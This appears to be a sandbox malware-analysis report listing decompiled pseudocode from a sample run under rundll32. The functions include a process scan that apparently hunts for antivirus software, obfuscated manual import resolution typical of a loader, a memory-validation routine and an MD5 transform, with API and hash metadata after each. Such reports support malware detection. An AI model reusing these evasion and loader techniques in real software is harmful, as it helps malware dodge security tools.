                				signed int _t61;
                				signed int _t62;
                				void* _t63;
                				signed int* _t68;
                				intOrPtr* _t69;
                				intOrPtr* _t71;
                				intOrPtr _t72;
                				intOrPtr _t75;
                				void* _t76;
                				signed int _t77;
                				void* _t78;
                				void _t80;
                				signed int _t81;
                				signed int _t84;
                				signed int _t86;
                				short* _t87;
                				void* _t89;
                				signed int* _t90;
                				long _t91;
                				signed int _t93;
                				signed int _t94;
                				signed int _t100;
                				signed int _t102;
                				void* _t104;
                				long _t108;
                				signed int _t110;
                
                				_t108 = _a4;
                				_t76 =  *(_t108 + 8);
                				if((_t76 & 0x00000003) != 0) {
                					L3:
                					return 0;
                				}
                				_a4 =  *[fs:0x4];
                				_v8 =  *[fs:0x8];
                				if(_t76 < _v8 || _t76 >= _a4) {
                					_t102 =  *(_t108 + 0xc);
                					__eflags = _t102 - 0xffffffff;
                					if(_t102 != 0xffffffff) {
                						_t91 = 0;
                						__eflags = 0;
                						_a4 = 0;
                						_t57 = _t76;
                						do {
                							_t80 =  *_t57;
                							__eflags = _t80 - 0xffffffff;
                							if(_t80 == 0xffffffff) {
                								goto L9;
                							}
                							__eflags = _t80 - _t91;
                							if(_t80 >= _t91) {
                								L20:
                								_t63 = 0;
                								L60:
                								return _t63;
                							}
                							L9:
                							__eflags =  *(_t57 + 4);
                							if( *(_t57 + 4) != 0) {
                								_t12 =  &_a4;
                								 *_t12 = _a4 + 1;
                								__eflags =  *_t12;
                							}
                							_t91 = _t91 + 1;
                							_t57 = _t57 + 0xc;
                							__eflags = _t91 - _t102;
                						} while (_t91 <= _t102);
                						__eflags = _a4;
                						if(_a4 == 0) {
                							L15:
                							_t81 =  *0x4041f8;
                							_t110 = _t76 & 0xfffff000;
                							_t58 = 0;
                							__eflags = _t81;
                							if(_t81 <= 0) {
                								L18:
                								_t104 = _t102 | 0xffffffff;
                								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                								__eflags = _t61;
                								if(_t61 < 0) {
                									_t62 = 0;
                									__eflags = 0;
                								} else {
                									_t62 = _a4;
                								}
                								__eflags = _t62;
                								if(_t62 == 0) {
                									L59:
                									_t63 = _t104;
                									goto L60;
                								} else {
                									__eflags = _v12 - 0x1000000;
                									if(_v12 != 0x1000000) {
                										goto L59;
                									}
                									__eflags = _v16 & 0x000000cc;
                									if((_v16 & 0x000000cc) == 0) {
                										L46:
                										_t63 = 1;
                										 *0x404240 = 1;
                										__eflags =  *0x404240;
                										if( *0x404240 != 0) {
                											goto L60;
                										}
                										_t84 =  *0x4041f8;
                										__eflags = _t84;
                										_t93 = _t84;
                										if(_t84 <= 0) {
                											L51:
                											__eflags = _t93;
                											if(_t93 != 0) {
                												L58:
                												 *0x404240 = 0;
                												goto L5;
                											}
                											_t77 = 0xf;
                											__eflags = _t84 - _t77;
                											if(_t84 <= _t77) {
                												_t77 = _t84;
                											}
                											_t94 = 0;
                											__eflags = _t77;
                											if(_t77 < 0) {
                												L56:
                												__eflags = _t84 - 0x10;
                												if(_t84 < 0x10) {
                													_t86 = _t84 + 1;
                													__eflags = _t86;
                													 *0x4041f8 = _t86;
                												}
                												goto L58;
                											} else {
                												do {
                													_t68 = 0x404200 + _t94 * 4;
                													_t94 = _t94 + 1;
                													__eflags = _t94 - _t77;
                													 *_t68 = _t110;
                													_t110 =  *_t68;
                												} while (_t94 <= _t77);
                												goto L56;
                											}
                										}
                										_t69 = 0x4041fc + _t84 * 4;
                										while(1) {
                											__eflags =  *_t69 - _t110;
                											if( *_t69 == _t110) {
                												goto L51;
                											}
                											_t93 = _t93 - 1;
                											_t69 = _t69 - 4;
                											__eflags = _t93;
                											if(_t93 > 0) {
                												continue;
                											}
                											goto L51;
                										}
                										goto L51;
                									}
                									_t87 = _v32;
                									__eflags =  *_t87 - 0x5a4d;
                									if( *_t87 != 0x5a4d) {
                										goto L59;
                									}
                									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                									__eflags =  *_t71 - 0x4550;
                									if( *_t71 != 0x4550) {
                										goto L59;
                									}
                									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                										goto L59;
                									}
                									_t78 = _t76 - _t87;
                									__eflags =  *((short*)(_t71 + 6));
                									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                									if( *((short*)(_t71 + 6)) <= 0) {
                										goto L59;
                									}
                									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                									__eflags = _t78 - _t72;
                									if(_t78 < _t72) {
                										goto L46;
                									}
                									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                										goto L46;
                									}
                									__eflags =  *(_t89 + 0x27) & 0x00000080;
                									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                										goto L20;
                									}
                									goto L46;
                								}
                							} else {
                								goto L16;
                							}
                							while(1) {
                								L16:
                								__eflags =  *((intOrPtr*)(0x404200 + _t58 * 4)) - _t110;
                								if( *((intOrPtr*)(0x404200 + _t58 * 4)) == _t110) {
                									break;
                								}
                								_t58 = _t58 + 1;
                								__eflags = _t58 - _t81;
                								if(_t58 < _t81) {
                									continue;
                								}
                								goto L18;
                							}
                							__eflags = _t58;
                							if(_t58 <= 0) {
                								goto L5;
                							}
                							 *0x404240 = 1;
                							__eflags =  *0x404240;
                							if( *0x404240 != 0) {
                								goto L5;
                							}
                							__eflags =  *((intOrPtr*)(0x404200 + _t58 * 4)) - _t110;
                							if( *((intOrPtr*)(0x404200 + _t58 * 4)) == _t110) {
                								L32:
                								_t100 = 0;
                								__eflags = _t58;
                								if(_t58 < 0) {
                									L34:
                									 *0x404240 = 0;
                									goto L5;
                								} else {
                									goto L33;
                								}
                								do {
                									L33:
                									_t90 = 0x404200 + _t100 * 4;
                									_t100 = _t100 + 1;
                									__eflags = _t100 - _t58;
                									 *_t90 = _t110;
                									_t110 =  *_t90;
                								} while (_t100 <= _t58);
                								goto L34;
                							}
                							_t58 = _t81 - 1;
                							__eflags = _t58;
                							if(_t58 < 0) {
                								L28:
                								__eflags = _t81 - 0x10;
                								if(_t81 < 0x10) {
                									_t81 = _t81 + 1;
                									__eflags = _t81;
                									 *0x4041f8 = _t81;
                								}
                								_t58 = _t81 - 1;
                								goto L32;
                							} else {
                								goto L25;
                							}
                							while(1) {
                								L25:
                								__eflags =  *((intOrPtr*)(0x404200 + _t58 * 4)) - _t110;
                								if( *((intOrPtr*)(0x404200 + _t58 * 4)) == _t110) {
                									break;
                								}
                								_t58 = _t58 - 1;
                								__eflags = _t58;
                								if(_t58 >= 0) {
                									continue;
                								}
                								break;
                							}
                							__eflags = _t58;
                							if(__eflags >= 0) {
                								if(__eflags == 0) {
                									goto L34;
                								}
                								goto L32;
                							}
                							goto L28;
                						}
                						_t75 =  *((intOrPtr*)(_t108 - 8));
                						__eflags = _t75 - _v8;
                						if(_t75 < _v8) {
                							goto L20;
                						}
                						__eflags = _t75 - _t108;
                						if(_t75 >= _t108) {
                							goto L20;
                						}
                						goto L15;
                					}
                					L5:
                					_t63 = 1;
                					goto L60;
                				} else {
                					goto L3;
                				}
                			}

                APIs
                • NtQueryVirtualMemory.NTDLL ref: 00402616
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: MemoryQueryVirtual
                • String ID: @B@$@B@$@B@
                • API String ID: 2850889275-824135644
                • Opcode ID: 5db2f640f3f824ace85a6282e0f6e49dfb23f40e338d13995ab38c96b1f5f191
                • Instruction ID: 4da47104038a29734a2657eb9a2c040d0d95a7db811d411bdad18f67836a8cdf
                • Opcode Fuzzy Hash: 5db2f640f3f824ace85a6282e0f6e49dfb23f40e338d13995ab38c96b1f5f191
                • Instruction Fuzzy Hash: 8661F2307006129FDB29CB28DB98A2A33E5EB95314F24847BD911F72D1E7B9DC82864C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E04B928F6() {
                				char _v264;
                				void* _v300;
                				int _t8;
                				intOrPtr _t9;
                				int _t15;
                				void* _t17;
                
                				_t15 = 0;
                				_t17 = CreateToolhelp32Snapshot(2, 0);
                				if(_t17 != 0) {
                					_t8 = Process32First(_t17,  &_v300);
                					while(_t8 != 0) {
                						_t9 =  *0x4b9a348; // 0x56d5a8
                						_t2 = _t9 + 0x4b9bea8; // 0x73617661
                						_push( &_v264);
                						if( *0x4b9a12c() != 0) {
                							_t15 = 1;
                						} else {
                							_t8 = Process32Next(_t17,  &_v300);
                							continue;
                						}
                						L7:
                						CloseHandle(_t17);
                						goto L8;
                					}
                					goto L7;
                				}
                				L8:
                				return _t15;
                			}

                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04B92906
                • Process32First.KERNEL32(00000000,?), ref: 04B92919
                • Process32Next.KERNEL32(00000000,?), ref: 04B92945
                • CloseHandle.KERNEL32(00000000), ref: 04B92954
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                • String ID:
                • API String ID: 420147892-0
                • Opcode ID: b069a3ac2c5e66cd96e707052b9204123cb6a4712e83e3c74d79f81a98679595
                • Instruction ID: d02fa003b5b890ad8004ffe27186f630bab5f27fd707200c1615c115aa30fe71
                • Opcode Fuzzy Hash: b069a3ac2c5e66cd96e707052b9204123cb6a4712e83e3c74d79f81a98679595
                • Instruction Fuzzy Hash: 10F0BB33A011697AEF24A636AC48EDB37ECDBDA314F0104F5EE49D3000EA24FD4686B5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00401385(void* __edi, intOrPtr _a4) {
                				signed int _v8;
                				intOrPtr* _v12;
                				_Unknown_base(*)()** _v16;
                				signed int _v20;
                				signed short _v24;
                				struct HINSTANCE__* _v28;
                				intOrPtr _t43;
                				intOrPtr* _t45;
                				intOrPtr _t46;
                				struct HINSTANCE__* _t47;
                				intOrPtr* _t49;
                				intOrPtr _t50;
                				signed short _t51;
                				_Unknown_base(*)()* _t53;
                				CHAR* _t54;
                				_Unknown_base(*)()* _t55;
                				void* _t58;
                				signed int _t59;
                				_Unknown_base(*)()* _t60;
                				intOrPtr _t61;
                				intOrPtr _t65;
                				signed int _t68;
                				void* _t69;
                				CHAR* _t71;
                				signed short* _t73;
                
                				_t69 = __edi;
                				_v20 = _v20 & 0x00000000;
                				_t59 =  *0x4041c0;
                				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
                				if(_t43 != 0) {
                					_t45 = _t43 + __edi;
                					_v12 = _t45;
                					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                					if(_t46 != 0) {
                						while(1) {
                							_t71 = _t46 + _t69;
                							_t47 = LoadLibraryA(_t71);
                							_v28 = _t47;
                							if(_t47 == 0) {
                								break;
                							}
                							_v24 = _v24 & 0x00000000;
                							 *_t71 = _t59 - 0x69b25f44;
                							_t49 = _v12;
                							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                							_t50 =  *_t49;
                							if(_t50 != 0) {
                								L6:
                								_t73 = _t50 + _t69;
                								_v16 = _t61 + _t69;
                								while(1) {
                									_t51 =  *_t73;
                									if(_t51 == 0) {
                										break;
                									}
                									if(__eflags < 0) {
                										__eflags = _t51 - _t69;
                										if(_t51 < _t69) {
                											L12:
                											_t21 =  &_v8;
                											 *_t21 = _v8 & 0x00000000;
                											__eflags =  *_t21;
                											_v24 =  *_t73 & 0x0000ffff;
                										} else {
                											_t65 = _a4;
                											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                												goto L12;
                											} else {
                												goto L11;
                											}
                										}
                									} else {
                										_t51 = _t51 + _t69;
                										L11:
                										_v8 = _t51;
                									}
                									_t53 = _v8;
                									__eflags = _t53;
                									if(_t53 == 0) {
                										_t54 = _v24 & 0x0000ffff;
                									} else {
                										_t54 = _t53 + 2;
                									}
                									_t55 = GetProcAddress(_v28, _t54);
                									__eflags = _t55;
                									if(__eflags == 0) {
                										_v20 = _t59 - 0x69b25ec5;
                									} else {
                										_t68 = _v8;
                										__eflags = _t68;
                										if(_t68 != 0) {
                											 *_t68 = _t59 - 0x69b25f44;
                										}
                										 *_v16 = _t55;
                										_t58 = 0x593682f4 + _t59 * 4;
                										_t73 = _t73 + _t58;
                										_t32 =  &_v16;
                										 *_t32 = _v16 + _t58;
                										__eflags =  *_t32;
                										continue;
                									}
                									goto L23;
                								}
                							} else {
                								_t50 = _t61;
                								if(_t61 != 0) {
                									goto L6;
                								}
                							}
                							L23:
                							_v12 = _v12 + 0x14;
                							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                							if(_t46 != 0) {
                								continue;
                							} else {
                							}
                							L26:
                							goto L27;
                						}
                						_t60 = _t59 + 0x964da13a;
                						__eflags = _t60;
                						_v20 = _t60;
                						goto L26;
                					}
                				}
                				L27:
                				return _v20;
                			}
                0x00000000
                0x004013ea
                0x0040146a
                0x0040146a
                0x00401471
                0x00401476
                0x00000000
                0x00000000
                0x0040147c
                0x00401487
                0x00000000
                0x00401487
                0x0040147e
                0x0040147e
                0x00401484
                0x00000000
                0x00401484
                0x004013b2
                0x00401488
                0x0040148d

                APIs
                • LoadLibraryA.KERNEL32 ref: 004013BD
                • GetProcAddress.KERNEL32(?,00000000), ref: 0040142F
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID:
                • API String ID: 2574300362-0
                • Opcode ID: 09c8a1ce1e59cb02426f2e5fd1934d1d1e8e4ba64be0f7ffcd113107977e49f2
                • Instruction ID: d5d8a9ff56a5fbd3c39ff80186cfb72a317dee8f78828c4d029b3e502e9a3da9
                • Opcode Fuzzy Hash: 09c8a1ce1e59cb02426f2e5fd1934d1d1e8e4ba64be0f7ffcd113107977e49f2
                • Instruction Fuzzy Hash: 6E313575A01216DBDB14CF99C890AAEB7F8FF44305B24417AD901FB3A0E738EA41CB59
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 49%
                			E04B939B3(void* __ecx, intOrPtr* _a4) {
                				signed int _v8;
                				signed int _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				intOrPtr _v40;
                				intOrPtr _v44;
                				intOrPtr _v48;
                				intOrPtr _v52;
                				intOrPtr _v56;
                				intOrPtr _v60;
                				intOrPtr _v64;
                				intOrPtr _v68;
                				intOrPtr _v72;
                				void _v76;
                				intOrPtr* _t226;
                				signed int _t229;
                				signed int _t231;
                				signed int _t233;
                				signed int _t235;
                				signed int _t237;
                				signed int _t239;
                				signed int _t241;
                				signed int _t243;
                				signed int _t245;
                				signed int _t247;
                				signed int _t249;
                				signed int _t251;
                				signed int _t253;
                				signed int _t255;
                				signed int _t257;
                				signed int _t259;
                				signed int _t338;
                				signed char* _t348;
                				signed int _t349;
                				signed int _t351;
                				signed int _t353;
                				signed int _t355;
                				signed int _t357;
                				signed int _t359;
                				signed int _t361;
                				signed int _t363;
                				signed int _t365;
                				signed int _t367;
                				signed int _t376;
                				signed int _t378;
                				signed int _t380;
                				signed int _t382;
                				signed int _t384;
                				intOrPtr* _t400;
                				signed int* _t401;
                				signed int _t402;
                				signed int _t404;
                				signed int _t406;
                				signed int _t408;
                				signed int _t410;
                				signed int _t412;
                				signed int _t414;
                				signed int _t416;
                				signed int _t418;
                				signed int _t420;
                				signed int _t422;
                				signed int _t424;
                				signed int _t432;
                				signed int _t434;
                				signed int _t436;
                				signed int _t438;
                				signed int _t440;
                				signed int _t508;
                				signed int _t599;
                				signed int _t607;
                				signed int _t613;
                				signed int _t679;
                				void* _t682;
                				signed int _t683;
                				signed int _t685;
                				signed int _t690;
                				signed int _t692;
                				signed int _t697;
                				signed int _t699;
                				signed int _t718;
                				signed int _t720;
                				signed int _t722;
                				signed int _t724;
                				signed int _t726;
                				signed int _t728;
                				signed int _t734;
                				signed int _t740;
                				signed int _t742;
                				signed int _t744;
                				signed int _t746;
                				signed int _t748;
                
                				_t226 = _a4;
                				_t348 = __ecx + 2;
                				_t401 =  &_v76;
                				_t682 = 0x10;
                				do {
                					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                					_t401 =  &(_t401[1]);
                					_t348 =  &(_t348[4]);
                					_t682 = _t682 - 1;
                				} while (_t682 != 0);
                				_t6 = _t226 + 4; // 0x14eb3fc3
                				_t683 =  *_t6;
                				_t7 = _t226 + 8; // 0x8d08458b
                				_t402 =  *_t7;
                				_t8 = _t226 + 0xc; // 0x56c1184c
                				_t349 =  *_t8;
                				asm("rol eax, 0x7");
                				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                				asm("rol ecx, 0xc");
                				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                				asm("ror edx, 0xf");
                				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                				asm("ror esi, 0xa");
                				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                				_v8 = _t685;
                				_t690 = _v8;
                				asm("rol eax, 0x7");
                				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                				asm("rol ecx, 0xc");
                				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                				asm("ror edx, 0xf");
                				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                				asm("ror esi, 0xa");
                				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                				_v8 = _t692;
                				_t697 = _v8;
                				asm("rol eax, 0x7");
                				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                				asm("rol ecx, 0xc");
                				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                				asm("ror edx, 0xf");
                				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                				asm("ror esi, 0xa");
                				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                				_v8 = _t699;
                				asm("rol eax, 0x7");
                				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                				asm("rol ecx, 0xc");
                				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                				_t508 =  !_t357;
                				asm("ror edx, 0xf");
                				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                				_v12 = _t410;
                				_v12 =  !_v12;
                				asm("ror esi, 0xa");
                				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                				asm("rol eax, 0x5");
                				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                				asm("rol ecx, 0x9");
                				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                				asm("rol edx, 0xe");
                				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                				asm("ror esi, 0xc");
                				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                				asm("rol eax, 0x5");
                				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                				asm("rol ecx, 0x9");
                				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                				asm("rol edx, 0xe");
                				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                				asm("ror esi, 0xc");
                				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                				asm("rol eax, 0x5");
                				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                				asm("rol ecx, 0x9");
                				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                				asm("rol edx, 0xe");
                				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                				asm("ror esi, 0xc");
                				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                				asm("rol eax, 0x5");
                				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                				asm("rol ecx, 0x9");
                				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                				asm("rol edx, 0xe");
                				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                				asm("ror esi, 0xc");
                				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                				asm("rol eax, 0x4");
                				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                				asm("rol ecx, 0xb");
                				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                				asm("rol edx, 0x10");
                				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                				_t599 = _t367 ^ _t420;
                				asm("ror esi, 0x9");
                				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                				asm("rol eax, 0x4");
                				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                				asm("rol edi, 0xb");
                				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                				asm("rol edx, 0x10");
                				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                				_t338 = _t607 ^ _t422;
                				asm("ror ecx, 0x9");
                				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                				asm("rol eax, 0x4");
                				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                				asm("rol esi, 0xb");
                				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                				asm("rol edi, 0x10");
                				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                				_t424 = _t734 ^ _t613;
                				asm("ror ecx, 0x9");
                				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                				asm("rol eax, 0x4");
                				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                				asm("rol edx, 0xb");
                				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                				asm("rol esi, 0x10");
                				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                				asm("ror ecx, 0x9");
                				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                				asm("rol eax, 0x6");
                				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                				asm("rol edx, 0xa");
                				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                				asm("rol esi, 0xf");
                				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                				asm("ror ecx, 0xb");
                				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                				asm("rol eax, 0x6");
                				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                				asm("rol edx, 0xa");
                				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                				asm("rol esi, 0xf");
                				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                				asm("ror ecx, 0xb");
                				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                				asm("rol eax, 0x6");
                				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                				asm("rol edx, 0xa");
                				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                				asm("rol esi, 0xf");
                				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                				asm("ror edi, 0xb");
                				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                				asm("rol eax, 0x6");
                				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                				asm("rol edx, 0xa");
                				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                				_t400 = _a4;
                				asm("rol esi, 0xf");
                				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                				 *_t400 =  *_t400 + _t259;
                				asm("ror eax, 0xb");
                				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                				return memset( &_v76, 0, 0x40);
                			}

                0x04b939b6
                0x04b939c1
                0x04b939c4
                0x04b939c7
                0x04b939c8
                0x04b939e6
                0x04b939e8
                0x04b939eb
                0x04b939ee
                0x04b939ee
                0x04b939f1
                0x04b939f1
                0x04b939f4
                0x04b939f4
                0x04b939f7
                0x04b939f7
                0x04b93a14
                0x04b93a17
                0x04b93a2d
                0x04b93a30
                0x04b93a4a
                0x04b93a4d
                0x04b93a63
                0x04b93a66
                0x04b93a68
                0x04b93a80
                0x04b93a83
                0x04b93a86
                0x04b93a9e
                0x04b93aa1
                0x04b93abb
                0x04b93abe
                0x04b93ad4
                0x04b93ad7
                0x04b93ad9
                0x04b93af1
                0x04b93af6
                0x04b93af9
                0x04b93b0f
                0x04b93b12
                0x04b93b2c
                0x04b93b2f
                0x04b93b45
                0x04b93b48
                0x04b93b4a
                0x04b93b65
                0x04b93b68
                0x04b93b7f
                0x04b93b82
                0x04b93b86
                0x04b93b9f
                0x04b93ba2
                0x04b93ba4
                0x04b93ba7
                0x04b93bc2
                0x04b93bc5
                0x04b93bde
                0x04b93be1
                0x04b93bf1
                0x04b93bf4
                0x04b93c0c
                0x04b93c0f
                0x04b93c29
                0x04b93c2c
                0x04b93c44
                0x04b93c47
                0x04b93c5d
                0x04b93c60
                0x04b93c78
                0x04b93c7b
                0x04b93c93
                0x04b93c96
                0x04b93cb0
                0x04b93cb3
                0x04b93cc9
                0x04b93ccc
                0x04b93ce4
                0x04b93ce7
                0x04b93d01
                0x04b93d04
                0x04b93d1c
                0x04b93d1f
                0x04b93d35
                0x04b93d38
                0x04b93d50
                0x04b93d53
                0x04b93d6b
                0x04b93d6e
